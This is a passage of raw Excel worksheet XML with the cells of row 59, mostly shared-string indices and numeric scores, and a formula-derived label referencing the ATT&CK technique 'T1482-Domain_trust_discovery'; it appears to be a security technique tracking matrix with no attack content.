      <c r="VD58" s="184"/>
      <c r="VE58" s="184"/>
      <c r="VF58" s="184"/>
      <c r="VG58" s="184"/>
      <c r="VH58" s="184"/>
      <c r="VI58" s="184"/>
      <c r="VJ58" s="184"/>
      <c r="VK58" s="184"/>
      <c r="VL58" s="184"/>
      <c r="VM58" s="184"/>
      <c r="VN58" s="184"/>
      <c r="VO58" s="184"/>
      <c r="VP58" s="184"/>
      <c r="VQ58" s="184"/>
      <c r="VR58" s="184"/>
      <c r="VS58" s="184"/>
      <c r="VT58" s="184"/>
      <c r="VU58" s="184"/>
      <c r="VV58" s="184"/>
      <c r="VW58" s="184"/>
      <c r="VX58" s="184"/>
      <c r="VY58" s="184"/>
    </row>
    <row r="59" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A59" s="82" t="s">
        <v>17</v>
      </c>
      <c r="B59" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C59" s="83" t="s">
        <v>315</v>
      </c>
      <c r="D59" s="83" t="s">
        <v>105</v>
      </c>
      <c r="E59" s="83">
        <f t="shared" si="2"/>
        <v>44</v>
      </c>
      <c r="F59" s="83" t="s">
        <v>106</v>
      </c>
      <c r="G59" s="94" t="s">
        <v>4</v>
      </c>
      <c r="H59" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I59" s="81" t="s">
        <v>1274</v>
      </c>
      <c r="J59" s="85" t="s">
        <v>1275</v>
      </c>
      <c r="K59" s="81" t="s">
        <v>1276</v>
      </c>
      <c r="L59" s="81" t="s">
        <v>1277</v>
      </c>
      <c r="M59" s="378" t="s">
        <v>229</v>
      </c>
      <c r="N59" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O59" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P59" s="91"/>
      <c r="Q59" s="379" t="s">
        <v>1008</v>
      </c>
      <c r="R59" s="92" t="s">
        <v>1278</v>
      </c>
      <c r="S59" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T59" s="92" t="s">
        <v>1279</v>
      </c>
      <c r="U59" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V59" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W59" s="96" t="s">
        <v>1280</v>
      </c>
      <c r="X59" s="97" t="s">
        <v>1281</v>
      </c>
      <c r="Y59" s="83" t="s">
        <v>1282</v>
      </c>
      <c r="Z59" s="98" t="s">
        <v>1283</v>
      </c>
      <c r="AA59" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB59" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC59" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD59" s="83"/>
      <c r="AE59" s="83"/>
      <c r="AF59" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG59" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH59" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI59" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ59" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK59" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL59" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM59" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN59" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO59" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP59" s="385" t="str">
        <f>M59&amp;"-frag"</f>
        <v>T1482-Domain_trust_discovery-frag</v>
      </c>
      <c r="AQ59" s="358">
        <v>4</v>
      </c>
      <c r="AR59" s="100"/>
      <c r="AS59" s="100">
        <v>1</v>
      </c>
      <c r="AT59" s="100">
        <v>0</v>
      </c>
      <c r="AU59" s="100">
        <v>1</v>
      </c>
      <c r="AV59" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW59" s="100">
        <v>1</v>
      </c>
      <c r="AX59" s="100">
        <v>1</v>
      </c>
      <c r="AY59" s="100">
        <v>0</v>
      </c>
      <c r="AZ59" s="100">
        <v>1</v>
      </c>
      <c r="BA59" s="381"/>
      <c r="BB59" s="101">
        <v>2</v>
      </c>
      <c r="BC59" s="102" t="s">
        <v>1813</v>
      </c>
      <c r="BD59" s="102">
        <v>2</v>
      </c>
      <c r="BE59" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="BF59" s="103">
        <v>2</v>
      </c>
      <c r="BG59" s="104">
        <v>1</v>
      </c>
      <c r="BH59" s="105">
        <v>0</v>
      </c>
      <c r="BI59" s="106">
        <v>0</v>
      </c>
      <c r="BJ59" s="497">
        <v>0</v>
      </c>
      <c r="BK59" s="107">
        <v>0</v>
      </c>
      <c r="BL59" s="107">
        <v>0</v>
      </c>
      <c r="BM59" s="108">
        <v>0</v>
      </c>
      <c r="BN59" s="109">
        <v>2</v>
      </c>
      <c r="BO59" s="110" t="s">
        <v>1813</v>
      </c>
      <c r="BP59" s="501">
        <v>2</v>
      </c>
      <c r="BQ59" s="111" t="s">
        <v>1814</v>
      </c>
      <c r="BR59" s="111">
        <v>2</v>
      </c>
      <c r="BS59" s="112">
        <v>1</v>
      </c>
      <c r="BT59" s="113">
        <v>5</v>
      </c>
      <c r="BU59" s="114" t="s">
        <v>3390</v>
      </c>
      <c r="BV59" s="503">
        <v>4</v>
      </c>
      <c r="BW59" s="115" t="s">
        <v>3391</v>
      </c>
      <c r="BX59" s="115">
        <v>3</v>
      </c>
      <c r="BY59" s="116">
        <v>3</v>
      </c>
      <c r="BZ59" s="250">
        <v>4</v>
      </c>
      <c r="CA59" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="CB59" s="505">
        <v>2</v>
      </c>
      <c r="CC59" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="CD59" s="252">
        <v>2</v>
      </c>
      <c r="CE59" s="253">
        <v>1</v>
      </c>
      <c r="CF59" s="101">
        <v>9</v>
      </c>
      <c r="CG59" s="102" t="s">
        <v>3392</v>
      </c>
      <c r="CH59" s="102">
        <v>6</v>
      </c>
      <c r="CI59" s="103" t="s">
        <v>3393</v>
      </c>
      <c r="CJ59" s="103">
        <v>5</v>
      </c>
      <c r="CK59" s="104">
        <v>3</v>
      </c>
      <c r="CL59" s="105">
        <v>0</v>
      </c>
      <c r="CM59" s="106">
        <v>0</v>
      </c>
      <c r="CN59" s="497">
        <v>0</v>
      </c>
      <c r="CO59" s="107">
        <v>0</v>
      </c>
      <c r="CP59" s="107">
        <v>0</v>
      </c>
      <c r="CQ59" s="108">
        <v>0</v>
      </c>
      <c r="CR59" s="109">
        <v>0</v>
      </c>
      <c r="CS59" s="110">
        <v>0</v>
      </c>
      <c r="CT59" s="501">
        <v>0</v>
      </c>
      <c r="CU59" s="111">
        <v>0</v>
      </c>
      <c r="CV59" s="111">
        <v>0</v>
      </c>
      <c r="CW59" s="112">
        <v>0</v>
      </c>
      <c r="CX59" s="113">
        <v>2</v>
      </c>
      <c r="CY59" s="114" t="s">
        <v>1813</v>
      </c>
      <c r="CZ59" s="503">
        <v>2</v>
      </c>
      <c r="DA59" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="DB59" s="115">
        <v>2</v>
      </c>
      <c r="DC59" s="116">
        <v>1</v>
      </c>
      <c r="DD59" s="101">
        <v>0</v>
      </c>
      <c r="DE59" s="102">
        <v>0</v>
      </c>
      <c r="DF59" s="102">
        <v>0</v>
      </c>
      <c r="DG59" s="103">
        <v>0</v>
      </c>
      <c r="DH59" s="103">
        <v>0</v>
      </c>
      <c r="DI59" s="104">
        <v>0</v>
      </c>
      <c r="DJ59" s="105">
        <v>0</v>
      </c>
      <c r="DK59" s="106">
        <v>0</v>
      </c>
      <c r="DL59" s="497">
        <v>0</v>
      </c>
      <c r="DM59" s="107">
        <v>0</v>
      </c>
      <c r="DN59" s="107">
        <v>0</v>
      </c>
      <c r="DO59" s="108">
        <v>0</v>
      </c>
      <c r="DP59" s="109">
        <v>0</v>
      </c>
      <c r="DQ59" s="110">
        <v>0</v>
      </c>
      <c r="DR59" s="501">
        <v>0</v>
      </c>
      <c r="DS59" s="111">
        <v>0</v>
      </c>
      <c r="DT59" s="111">
        <v>0</v>
      </c>
      <c r="DU59" s="112">
        <v>0</v>
      </c>
      <c r="DV59" s="113">
        <v>3</v>
      </c>
      <c r="DW59" s="114" t="s">
        <v>3394</v>
      </c>
      <c r="DX59" s="503">
        <v>2</v>
      </c>
      <c r="DY59" s="115" t="s">
        <v>3395</v>
      </c>
      <c r="DZ59" s="115">
        <v>1</v>
      </c>
      <c r="EA59" s="116">
        <v>2</v>
      </c>
      <c r="EB59" s="250">
        <v>0</v>
      </c>
      <c r="EC59" s="251">
        <v>0</v>
      </c>
      <c r="ED59" s="505">
        <v>0</v>
      </c>
      <c r="EE59" s="252">
        <v>0</v>
      </c>
      <c r="EF59" s="252">
        <v>0</v>
      </c>
      <c r="EG59" s="253">
        <v>0</v>
      </c>
      <c r="EH59" s="101">
        <v>3</v>
      </c>
      <c r="EI59" s="102" t="s">
        <v>3394</v>
      </c>
      <c r="EJ59" s="102">
        <v>2</v>
      </c>
      <c r="EK59" s="103" t="s">
        <v>3395</v>
      </c>
      <c r="EL59" s="103">
        <v>1</v>
      </c>
      <c r="EM59" s="104">
        <v>2</v>
      </c>
      <c r="EN59" s="105">
        <v>0</v>
      </c>
      <c r="EO59" s="106">
        <v>0</v>
      </c>
      <c r="EP59" s="497">
        <v>0</v>
      </c>
      <c r="EQ59" s="107">
        <v>0</v>
      </c>
      <c r="ER59" s="107">
        <v>0</v>
      </c>
      <c r="ES59" s="108">
        <v>0</v>
      </c>
      <c r="ET59" s="109">
        <v>0</v>
      </c>
      <c r="EU59" s="110">
        <v>0</v>
      </c>
      <c r="EV59" s="501">
        <v>0</v>
      </c>
      <c r="EW59" s="111">
        <v>0</v>
      </c>
      <c r="EX59" s="111">
        <v>0</v>
      </c>
      <c r="EY59" s="112">
        <v>0</v>
      </c>
      <c r="EZ59" s="113">
        <v>0</v>
      </c>
      <c r="FA59" s="114">
        <v>0</v>
      </c>
      <c r="FB59" s="503">
        <v>0</v>
      </c>
      <c r="FC59" s="115">
        <v>0</v>
      </c>
      <c r="FD59" s="115">
        <v>0</v>
      </c>
      <c r="FE59" s="116">
        <v>0</v>
      </c>
      <c r="FF59" s="101">
        <v>0</v>
      </c>
      <c r="FG59" s="102">
        <v>0</v>
      </c>
      <c r="FH59" s="102">
        <v>0</v>
      </c>
      <c r="FI59" s="103">
        <v>0</v>
      </c>
      <c r="FJ59" s="103">
        <v>0</v>
      </c>
      <c r="FK59" s="104">
        <v>0</v>
      </c>
      <c r="FL59" s="105">
        <v>0</v>
      </c>
      <c r="FM59" s="106">
        <v>0</v>
      </c>
      <c r="FN59" s="497">
        <v>0</v>
      </c>
      <c r="FO59" s="107">
        <v>0</v>
      </c>
      <c r="FP59" s="107">
        <v>0</v>
      </c>
      <c r="FQ59" s="108">
        <v>0</v>
      </c>
      <c r="FR59" s="109">
        <v>0</v>
      </c>
      <c r="FS59" s="110">
        <v>0</v>
      </c>
      <c r="FT59" s="501">
        <v>0</v>
      </c>
      <c r="FU59" s="111">
        <v>0</v>
      </c>
      <c r="FV59" s="111">
        <v>0</v>
      </c>
      <c r="FW59" s="112">
        <v>0</v>
      </c>
      <c r="FX59" s="113">
        <v>0</v>
      </c>
      <c r="FY59" s="114">
        <v>0</v>
      </c>
      <c r="FZ59" s="503">
        <v>0</v>
      </c>
      <c r="GA59" s="115">
        <v>0</v>
      </c>
      <c r="GB59" s="115">
        <v>0</v>
      </c>
      <c r="GC59" s="116">
        <v>0</v>
      </c>
      <c r="GD59" s="250">
        <v>4</v>
      </c>
      <c r="GE59" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF59" s="505">
        <v>2</v>
      </c>
      <c r="GG59" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH59" s="252">
        <v>2</v>
      </c>
      <c r="GI59" s="253">
        <v>1</v>
      </c>
      <c r="GJ59" s="101">
        <v>4</v>
      </c>
      <c r="GK59" s="102" t="s">
        <v>1902</v>
      </c>
      <c r="GL59" s="102">
        <v>2</v>
      </c>
      <c r="GM59" s="103" t="s">
        <v>1903</v>
      </c>
      <c r="GN59" s="103">
        <v>2</v>
      </c>
      <c r="GO59" s="104">
        <v>1</v>
      </c>
      <c r="GP59" s="105">
        <v>0</v>
      </c>
      <c r="GQ59" s="106">
        <v>0</v>
      </c>
      <c r="GR59" s="497">
        <v>0</v>
      </c>
      <c r="GS59" s="107">
        <v>0</v>
      </c>
      <c r="GT59" s="107">
        <v>0</v>
      </c>
      <c r="GU59" s="108">
        <v>0</v>
      </c>
      <c r="GV59" s="109">
        <v>0</v>
      </c>
      <c r="GW59" s="110">
        <v>0</v>
      </c>
      <c r="GX59" s="501">
        <v>0</v>
      </c>
      <c r="GY59" s="111">
        <v>0</v>
      </c>
      <c r="GZ59" s="111">
        <v>0</v>
      </c>
      <c r="HA59" s="112">
        <v>0</v>
      </c>
      <c r="HB59" s="113">
        <v>0</v>
      </c>
      <c r="HC59" s="114">
        <v>0</v>
      </c>
      <c r="HD59" s="503">
        <v>0</v>
      </c>
      <c r="HE59" s="115">
        <v>0</v>
      </c>
      <c r="HF59" s="115">
        <v>0</v>
      </c>
      <c r="HG59" s="116">
        <v>0</v>
      </c>
      <c r="HH59" s="101">
        <v>2</v>
      </c>
      <c r="HI59" s="102" t="s">
        <v>1813</v>
      </c>
      <c r="HJ59" s="102">
        <v>2</v>
      </c>
      <c r="HK59" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="HL59" s="103">
        <v>2</v>
      </c>
      <c r="HM59" s="104">
        <v>1</v>
      </c>
      <c r="HN59" s="105">
        <v>0</v>
      </c>
      <c r="HO59" s="106">
        <v>0</v>
      </c>
      <c r="HP59" s="497">
        <v>0</v>
      </c>
      <c r="HQ59" s="107">
        <v>0</v>
      </c>
      <c r="HR59" s="107">
        <v>0</v>
      </c>
      <c r="HS59" s="108">
        <v>0</v>
      </c>
      <c r="HT59" s="109">
        <v>2</v>
      </c>
      <c r="HU59" s="110" t="s">
        <v>1813</v>
      </c>
      <c r="HV59" s="501">
        <v>2</v>
      </c>
      <c r="HW59" s="111" t="s">
        <v>1814</v>
      </c>
      <c r="HX59" s="111">
        <v>2</v>
      </c>
      <c r="HY59" s="112">
        <v>1</v>
      </c>
      <c r="HZ59" s="113">
        <v>2</v>
      </c>
      <c r="IA59" s="114" t="s">
        <v>1813</v>
      </c>
      <c r="IB59" s="503">
        <v>2</v>
      </c>
      <c r="IC59" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="ID59" s="115">
        <v>2</v>
      </c>
      <c r="IE59" s="116">
        <v>1</v>
      </c>
      <c r="IF59" s="250">
        <v>0</v>
      </c>
      <c r="IG59" s="251">
        <v>0</v>
      </c>
      <c r="IH59" s="505">
        <v>0</v>
      </c>
      <c r="II59" s="252">
        <v>0</v>
      </c>
      <c r="IJ59" s="252">
        <v>0</v>
      </c>
      <c r="IK59" s="253">
        <v>0</v>
      </c>
      <c r="IL59" s="101">
        <v>2</v>
      </c>
      <c r="IM59" s="102" t="s">
        <v>1813</v>
      </c>
      <c r="IN59" s="102">
        <v>2</v>
      </c>
      <c r="IO59" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="IP59" s="103">
        <v>2</v>
      </c>
      <c r="IQ59" s="104">
        <v>1</v>
      </c>
      <c r="IR59" s="105">
        <v>0</v>
      </c>
      <c r="IS59" s="106">
        <v>0</v>
      </c>
      <c r="IT59" s="497">
        <v>0</v>
      </c>
      <c r="IU59" s="107">
        <v>0</v>
      </c>
      <c r="IV59" s="107">
        <v>0</v>
      </c>
      <c r="IW59" s="108">
        <v>0</v>
      </c>
      <c r="IX59" s="109">
        <v>0</v>
      </c>
      <c r="IY59" s="110">
        <v>0</v>
      </c>
      <c r="IZ59" s="501">
        <v>0</v>
      </c>
      <c r="JA59" s="111">
        <v>0</v>
      </c>
      <c r="JB59" s="111">
        <v>0</v>
      </c>
      <c r="JC59" s="112">
        <v>0</v>
      </c>
      <c r="JD59" s="113">
        <v>2</v>
      </c>
      <c r="JE59" s="114" t="s">
        <v>1813</v>
      </c>
      <c r="JF59" s="503">
        <v>2</v>
      </c>
      <c r="JG59" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="JH59" s="115">
        <v>2</v>
      </c>
      <c r="JI59" s="116">
        <v>1</v>
      </c>
      <c r="JJ59" s="101">
        <v>0</v>
      </c>
      <c r="JK59" s="102">
        <v>0</v>
      </c>
      <c r="JL59" s="102">
        <v>0</v>
      </c>
      <c r="JM59" s="103">
        <v>0</v>
      </c>
      <c r="JN59" s="103">
        <v>0</v>
      </c>
      <c r="JO59" s="104">
        <v>0</v>
      </c>
      <c r="JP59" s="105">
        <v>0</v>
      </c>
      <c r="JQ59" s="106">
        <v>0</v>
      </c>
      <c r="JR59" s="497">
        <v>0</v>
      </c>
      <c r="JS59" s="107">
        <v>0</v>
      </c>
      <c r="JT59" s="107">
        <v>0</v>
      </c>
      <c r="JU59" s="108">
        <v>0</v>
      </c>
      <c r="JV59" s="109">
        <v>0</v>
      </c>
      <c r="JW59" s="110">
        <v>0</v>
      </c>
      <c r="JX59" s="501">
        <v>0</v>
      </c>
      <c r="JY59" s="111">
        <v>0</v>
      </c>
      <c r="JZ59" s="111">
        <v>0</v>
      </c>
      <c r="KA59" s="112">
        <v>0</v>
      </c>
      <c r="KB59" s="113">
        <v>0</v>
      </c>
      <c r="KC59" s="114">
        <v>0</v>
      </c>
      <c r="KD59" s="503">
        <v>0</v>
      </c>
      <c r="KE59" s="115">
        <v>0</v>
      </c>
      <c r="KF59" s="115">
        <v>0</v>
      </c>
      <c r="KG59" s="116">
        <v>0</v>
      </c>
      <c r="KH59" s="250">
        <v>0</v>
      </c>
      <c r="KI59" s="251">
        <v>0</v>
      </c>
      <c r="KJ59" s="505">
        <v>0</v>
      </c>
      <c r="KK59" s="252">
        <v>0</v>
      </c>
      <c r="KL59" s="252">
        <v>0</v>
      </c>
      <c r="KM59" s="253">
        <v>0</v>
      </c>
      <c r="KN59" s="101">
        <v>0</v>
      </c>
      <c r="KO59" s="102">
        <v>0</v>
      </c>
      <c r="KP59" s="102">
        <v>0</v>
      </c>
      <c r="KQ59" s="103">
        <v>0</v>
      </c>
      <c r="KR59" s="103">
        <v>0</v>
      </c>
      <c r="KS59" s="104">
        <v>0</v>
      </c>
      <c r="KT59" s="105">
        <v>0</v>
      </c>
      <c r="KU59" s="106">
        <v>0</v>
      </c>
      <c r="KV59" s="497">
        <v>0</v>
      </c>
      <c r="KW59" s="107">
        <v>0</v>
      </c>
      <c r="KX59" s="107">
        <v>0</v>
      </c>
      <c r="KY59" s="108">
        <v>0</v>
      </c>
      <c r="KZ59" s="109">
        <v>0</v>
      </c>
      <c r="LA59" s="110">
        <v>0</v>
      </c>
      <c r="LB59" s="501">
        <v>0</v>
      </c>
      <c r="LC59" s="111">
        <v>0</v>
      </c>
      <c r="LD59" s="111">
        <v>0</v>
      </c>
      <c r="LE59" s="112">
        <v>0</v>
      </c>
      <c r="LF59" s="113">
        <v>0</v>
      </c>
      <c r="LG59" s="114">
        <v>0</v>
      </c>
      <c r="LH59" s="503">
        <v>0</v>
      </c>
      <c r="LI59" s="115">
        <v>0</v>
      </c>
      <c r="LJ59" s="115">
        <v>0</v>
      </c>
      <c r="LK59" s="116">
        <v>0</v>
      </c>
      <c r="LL59" s="117">
        <v>7</v>
      </c>
      <c r="LM59" s="507">
        <v>5</v>
      </c>
      <c r="LN59" s="119">
        <v>1</v>
      </c>
      <c r="LO59" s="119">
        <v>2</v>
      </c>
      <c r="LP59" s="119">
        <v>4</v>
      </c>
      <c r="LQ59" s="119">
        <v>3</v>
      </c>
      <c r="LR59" s="119">
        <v>2</v>
      </c>
      <c r="LS59" s="119">
        <v>4</v>
      </c>
      <c r="LT59" s="382"/>
      <c r="LU59" s="117">
        <v>5</v>
      </c>
      <c r="LV59" s="118" t="s">
        <v>4238</v>
      </c>
      <c r="LW59" s="507">
        <v>3</v>
      </c>
      <c r="LX59" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY59" s="119">
        <v>1</v>
      </c>
      <c r="LZ59" s="119">
        <v>3</v>
      </c>
      <c r="MA59" s="117">
        <v>0</v>
      </c>
      <c r="MB59" s="118">
        <v>0</v>
      </c>
      <c r="MC59" s="507">
        <v>0</v>
      </c>
      <c r="MD59" s="119">
        <v>0</v>
      </c>
      <c r="ME59" s="119">
        <v>0</v>
      </c>
      <c r="MF59" s="119">
        <v>0</v>
      </c>
      <c r="MG59" s="117">
        <v>0</v>
      </c>
      <c r="MH59" s="118">
        <v>0</v>
      </c>
      <c r="MI59" s="507">
        <v>0</v>
      </c>
      <c r="MJ59" s="119">
        <v>0</v>
      </c>
      <c r="MK59" s="119">
        <v>0</v>
      </c>
      <c r="ML59" s="119">
        <v>0</v>
      </c>
      <c r="MM59" s="117">
        <v>0</v>
      </c>
      <c r="MN59" s="118">
        <v>0</v>
      </c>
      <c r="MO59" s="507">
        <v>0</v>
      </c>
      <c r="MP59" s="119">
        <v>0</v>
      </c>
      <c r="MQ59" s="119">
        <v>0</v>
      </c>
      <c r="MR59" s="119">
        <v>0</v>
      </c>
      <c r="MS59" s="117">
        <v>0</v>
      </c>
      <c r="MT59" s="118">
        <v>0</v>
      </c>
      <c r="MU59" s="507">
        <v>0</v>
      </c>
      <c r="MV59" s="119">
        <v>0</v>
      </c>
      <c r="MW59" s="119">
        <v>0</v>
      </c>
      <c r="MX59" s="119">
        <v>0</v>
      </c>
      <c r="MY59" s="117">
        <v>0</v>
      </c>
      <c r="MZ59" s="118">
        <v>0</v>
      </c>
      <c r="NA59" s="507">
        <v>0</v>
      </c>
      <c r="NB59" s="119">
        <v>0</v>
      </c>
      <c r="NC59" s="119">
        <v>0</v>
      </c>
      <c r="ND59" s="119">
        <v>0</v>
      </c>
      <c r="NE59" s="117">
        <v>0</v>
      </c>
      <c r="NF59" s="118">
        <v>0</v>
      </c>
      <c r="NG59" s="507">
        <v>0</v>
      </c>
      <c r="NH59" s="119">
        <v>0</v>
      </c>
      <c r="NI59" s="119">
        <v>0</v>
      </c>
      <c r="NJ59" s="119">
        <v>0</v>
      </c>
      <c r="NK59" s="117">
        <v>0</v>
      </c>
      <c r="NL59" s="118">
        <v>0</v>
      </c>
      <c r="NM59" s="507">
        <v>0</v>
      </c>
      <c r="NN59" s="119">
        <v>0</v>
      </c>
      <c r="NO59" s="119">
        <v>0</v>
      </c>
      <c r="NP59" s="119">
        <v>0</v>
      </c>
      <c r="NQ59" s="117">
        <v>0</v>
      </c>
      <c r="NR59" s="118">
        <v>0</v>
      </c>
      <c r="NS59" s="507">
        <v>0</v>
      </c>
      <c r="NT59" s="119">
        <v>0</v>
      </c>
      <c r="NU59" s="119">
        <v>0</v>
      </c>
      <c r="NV59" s="119">
        <v>0</v>
      </c>
      <c r="NW59" s="117">
        <v>2</v>
      </c>
      <c r="NX59" s="118" t="s">
        <v>4378</v>
      </c>
      <c r="NY59" s="507">
        <v>2</v>
      </c>
      <c r="NZ59" s="119" t="s">
        <v>4379</v>
      </c>
      <c r="OA59" s="119">
        <v>2</v>
      </c>
      <c r="OB59" s="119">
        <v>2</v>
      </c>
      <c r="OC59" s="120">
        <v>1</v>
      </c>
      <c r="OD59" s="120">
        <v>1</v>
      </c>
      <c r="OE59" s="120">
        <v>1</v>
      </c>
      <c r="OF59" s="121">
        <v>1</v>
      </c>
      <c r="OG59" s="120">
        <v>1</v>
      </c>
      <c r="OH59" s="120">
        <v>1</v>
      </c>
      <c r="OI59" s="120">
        <v>1</v>
      </c>
      <c r="OJ59" s="120">
        <v>1</v>
      </c>
      <c r="OK59" s="383"/>
      <c r="OL59" s="120">
        <v>1</v>
      </c>
      <c r="OM59" s="120">
        <v>1</v>
      </c>
      <c r="ON59" s="120">
        <v>1</v>
      </c>
      <c r="OO59" s="120" t="s">
        <v>3396</v>
      </c>
      <c r="OP59" s="120">
        <v>1</v>
      </c>
      <c r="OQ59" s="464">
        <v>1</v>
      </c>
      <c r="OR59" s="120">
        <v>0</v>
      </c>
      <c r="OS59" s="120">
        <v>0</v>
      </c>
      <c r="OT59" s="120">
        <v>0</v>
      </c>
      <c r="OU59" s="120"/>
      <c r="OV59" s="120">
        <v>0</v>
      </c>
      <c r="OW59" s="464">
        <v>0</v>
      </c>
      <c r="OX59" s="120">
        <v>0</v>
      </c>
      <c r="OY59" s="120">
        <v>0</v>
      </c>
      <c r="OZ59" s="120">
        <v>0</v>
      </c>
      <c r="PA59" s="120"/>
      <c r="PB59" s="120">
        <v>0</v>
      </c>
      <c r="PC59" s="464">
        <v>0</v>
      </c>
      <c r="PD59" s="120">
        <v>0</v>
      </c>
      <c r="PE59" s="120">
        <v>0</v>
      </c>
      <c r="PF59" s="120">
        <v>0</v>
      </c>
      <c r="PG59" s="120"/>
      <c r="PH59" s="120">
        <v>0</v>
      </c>
      <c r="PI59" s="464">
        <v>0</v>
      </c>
      <c r="PJ59" s="120">
        <v>0</v>
      </c>
      <c r="PK59" s="120">
        <v>0</v>
      </c>
      <c r="PL59" s="120">
        <v>0</v>
      </c>
      <c r="PM59" s="120"/>
      <c r="PN59" s="120">
        <v>0</v>
      </c>
      <c r="PO59" s="464">
        <v>0</v>
      </c>
      <c r="PP59" s="120">
        <v>0</v>
      </c>
      <c r="PQ59" s="120">
        <v>0</v>
      </c>
      <c r="PR59" s="120">
        <v>0</v>
      </c>
      <c r="PS59" s="120"/>
      <c r="PT59" s="120">
        <v>0</v>
      </c>
      <c r="PU59" s="464">
        <v>0</v>
      </c>
      <c r="PV59" s="120">
        <v>1</v>
      </c>
      <c r="PW59" s="120">
        <v>1</v>
      </c>
      <c r="PX59" s="120">
        <v>1</v>
      </c>
      <c r="PY59" s="120" t="s">
        <v>3017</v>
      </c>
      <c r="PZ59" s="120">
        <v>1</v>
      </c>
      <c r="QA59" s="464">
        <v>1</v>
      </c>
      <c r="QB59" s="120">
        <v>0</v>
      </c>
      <c r="QC59" s="120">
        <v>0</v>
      </c>
      <c r="QD59" s="120">
        <v>0</v>
      </c>
      <c r="QE59" s="120"/>
      <c r="QF59" s="120">
        <v>0</v>
      </c>
      <c r="QG59" s="464">
        <v>0</v>
      </c>
      <c r="QH59" s="120">
        <v>0</v>
      </c>
      <c r="QI59" s="120">
        <v>0</v>
      </c>
      <c r="QJ59" s="120">
        <v>0</v>
      </c>
      <c r="QK59" s="120"/>
      <c r="QL59" s="120">
        <v>0</v>
      </c>
      <c r="QM59" s="464">
        <v>0</v>
      </c>
      <c r="QN59" s="120">
        <v>0</v>
      </c>
      <c r="QO59" s="120">
        <v>0</v>
      </c>
      <c r="QP59" s="120">
        <v>0</v>
      </c>
      <c r="QQ59" s="120"/>
      <c r="QR59" s="120">
        <v>0</v>
      </c>
      <c r="QS59" s="464">
        <v>0</v>
      </c>
      <c r="QT59" s="184"/>
      <c r="QU59" s="184"/>
      <c r="QV59" s="184"/>
      <c r="QW59" s="184"/>
      <c r="QX59" s="184"/>
      <c r="QY59" s="184"/>
      <c r="QZ59" s="184"/>
      <c r="RA59" s="184"/>
      <c r="RB59" s="184"/>
      <c r="RC59" s="184"/>
      <c r="RD59" s="184"/>
      <c r="RE59" s="184"/>
      <c r="RF59" s="184"/>
      <c r="RG59" s="184"/>
      <c r="RH59" s="184"/>
      <c r="RI59" s="184"/>
      <c r="RJ59" s="184"/>
      <c r="RK59" s="184"/>
      <c r="RL59" s="184"/>
      <c r="RM59" s="184"/>
      <c r="RN59" s="184"/>
      <c r="RO59" s="184"/>
      <c r="RP59" s="184"/>
      <c r="RQ59" s="184"/>
      <c r="RR59" s="184"/>
      <c r="RS59" s="184"/>
      <c r="RT59" s="184"/>
      <c r="RU59" s="184"/>
      <c r="RV59" s="184"/>
      <c r="RW59" s="184"/>
      <c r="RX59" s="184"/>
      <c r="RY59" s="184"/>
      <c r="RZ59" s="184"/>
      <c r="SA59" s="184"/>
      <c r="SB59" s="184"/>
      <c r="SC59" s="184"/>
      <c r="SD59" s="184"/>
      <c r="SE59" s="184"/>
      <c r="SF59" s="184"/>
      <c r="SG59" s="184"/>
      <c r="SH59" s="184"/>
      <c r="SI59" s="184"/>
      <c r="SJ59" s="184"/>
      <c r="SK59" s="184"/>
      <c r="SL59" s="184"/>
      <c r="SM59" s="184"/>
      <c r="SN59" s="184"/>
      <c r="SO59" s="184"/>
      <c r="SP59" s="184"/>
      <c r="SQ59" s="184"/>
      <c r="SR59" s="184"/>
      <c r="SS59" s="184"/>
      <c r="ST59" s="184"/>
      <c r="SU59" s="184"/>
      <c r="SV59" s="184"/>
      <c r="SW59" s="184"/>
      <c r="SX59" s="184"/>
      <c r="SY59" s="184"/>
      <c r="SZ59" s="184"/>
      <c r="TA59" s="184"/>
      <c r="TB59" s="184"/>
      <c r="TC59" s="184"/>
      <c r="TD59" s="184"/>
      <c r="TE59" s="184"/>
      <c r="TF59" s="184"/>
      <c r="TG59" s="184"/>
      <c r="TH59" s="184"/>
      <c r="TI59" s="184"/>
      <c r="TJ59" s="184"/>
      <c r="TK59" s="184"/>
      <c r="TL59" s="184"/>
      <c r="TM59" s="184"/>
      <c r="TN59" s="184"/>
      <c r="TO59" s="184"/>
      <c r="TP59" s="184"/>
      <c r="TQ59" s="184"/>
      <c r="TR59" s="184"/>
      <c r="TS59" s="184"/>
      <c r="TT59" s="184"/>
      <c r="TU59" s="184"/>
      <c r="TV59" s="184"/>
      <c r="TW59" s="184"/>
      <c r="TX59" s="184"/>
      <c r="TY59" s="184"/>
      <c r="TZ59" s="184"/>
      <c r="UA59" s="184"/>
      <c r="UB59" s="184"/>
      <c r="UC59" s="184"/>
